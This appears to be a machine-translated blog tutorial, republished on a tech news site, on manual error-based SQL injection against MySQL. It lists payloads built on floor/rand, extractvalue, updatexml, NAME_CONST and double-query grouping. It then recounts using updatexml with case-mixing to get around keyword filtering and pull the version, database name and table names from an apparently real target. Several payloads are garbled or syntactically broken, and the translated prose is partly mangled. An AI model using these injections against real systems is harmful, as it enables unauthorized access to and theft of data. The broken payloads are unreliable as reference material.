Shulou(Shulou.com)06/01 Report--

In our actual *, we obviously found an injection point and thought it would be OK to throw it to sqlmap. As a result, sqlmap only shows that it is indeed an injection point, but the database cannot get it, as shown in figure 1. In this case, we can use manual injection to determine the filtering rules and basic filtering, and then select the corresponding sqlmap script (if any). This article is mainly about how to inject through the error report of the mysql function, and how to use manual full injection. If you know that there is a corresponding script in sqlmap, please let me know. Thank you.

Figure 1 failed to get the database

At this time, we can consider whether it is apparent error injection. For apparent error injection, we can use the mysql apparent error injection function to query database information.

An error is reported through floor:

And select 1 from (select count (*), concat (version (), floor (rand (0) * 2) x from information_schema.tables group by x) a) and (select count (*) from (select 1 union select null union select! 1) x group by concat ((select version ()), floor (rand (0) * 2)

An error is reported through ExtractValue:

And extractvalue (1, concat (0x7f, (select version ()), 0x7f))

An error is reported through UpdateXml:

And 1 = (updatexml (1) concat (0x7f, (select version ()), 0x7f), 1))

An error is reported through NAME_CONST:

And 1 = (select * from (select NAME_CONST (version (), 1), NAME_CONST (version (), 1)) as x)

Through the wrong double query:

Or 1 group by concat_ws (0x7fje version (), floor (rand (0) * 2) having min (0) or 1

Here we carry on the actual combat demonstration with the UpdateXml error report, as shown in figure 2 is an error injection point.

Figure 2 shows the wrong injection point

At this point, we will do SQL injection through UpdateXml. Here, because the keywords are filtered, we need to use case to bypass. First, we query the database version, as shown in figure 3, and successfully get the database version.

Figure 3 get database version information

Get the database name, as shown in figure 4.

Figure 4 getting the data name

Get the table name, as shown in figure 5.

Figure 5 get the table name

For follow-up operations, please refer to the article "manual injection of mysql", which is no longer cumbersome!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.